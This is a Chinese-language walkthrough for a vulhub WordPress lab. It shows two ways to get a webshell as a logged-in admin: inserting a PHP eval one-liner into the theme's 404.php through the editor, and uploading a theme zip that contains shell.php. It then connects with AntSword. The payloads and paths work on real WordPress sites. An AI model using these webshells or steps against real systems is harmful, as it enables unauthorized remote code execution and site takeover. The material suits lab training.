1.进入靶场环境:
输入:cd / vulhub / wordpress / pwnscriptum
修改版本号: vim docker-compose.ymlversion: '3' 保存退出
开启靶场环境: docker - compose up - d
开启成功,docker ps查看端口 靶场环境8080端口映射到80端口
2. 浏览器访问靶场ip+端口
192.168.182.143:8080
选择简体中文,点击“继续”。
3. 填入信息,进行安装
安装完成,进行登录。
4.获得webshell
4.1 姿势一:后台修改模板拿webshell
4.1.1 修改模板内容
修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外
观】 --》 【编辑】 --》 404.php
4.1.2 写入一句话木马
在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮<? php eval ( $_POST [ cmd ]);?>
4.1.3 拼接路径,访问文件,蚁剑连接
#拼接路径 /wp-content/themes/twentyfifteen/404.php访问连接: http://192.168.182.143:8080/wp-content/themes/twentyfifteen/404.php
4.2 姿势二:上传主题拿WebShell
4.2.1写入木马文件,和正常的主题模板合并压缩为1.zip文件
写入一句话木马,保存文件为shell.php。<?php @eval($_POST[cmd]);?>
在网址中任意下载一个免费的模板zip文件; wordpress免费主题|wordpress企业主题|wordpress cms主题|wordpress网站模板|wordpress模板-WEB主题公园
解压后,将shell.php文件拖入解压包,并再次压缩为1.zip文件
4.2.2 上传主题
点击 【外 观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】
4.2.3 拼接路径,访问连接,蚁剑连接
#拼接路径 /wp-content/themes/压缩包解压后文件名/木马文件名.php
该压缩包文件,再上传上去后,会自动解压,从而进行安装主题。此次木马php文件也在解压后的文件里,即在网站根目录且可以访问。
访问:http://192.168.182.143:8080/wp-content/themes/1/shell.php 【这里的1,指的是压缩包解压得到的文件的文件名】
练习结束,知道目标网站的CMS架构,搜索常见漏洞可进行尝试。
修改原有php文件,写入一句话木马;
上传包含木马php文件的正常模板压缩包,上传完成后,会自动解压安装主题,因而木马文件成功上传到网站,访问木马文件,即可获取webshell。
WordPress框架,这两种方式通用。
希望对大家有所帮助,谢谢。
再见。。。
-----------2025/3/20 20:25
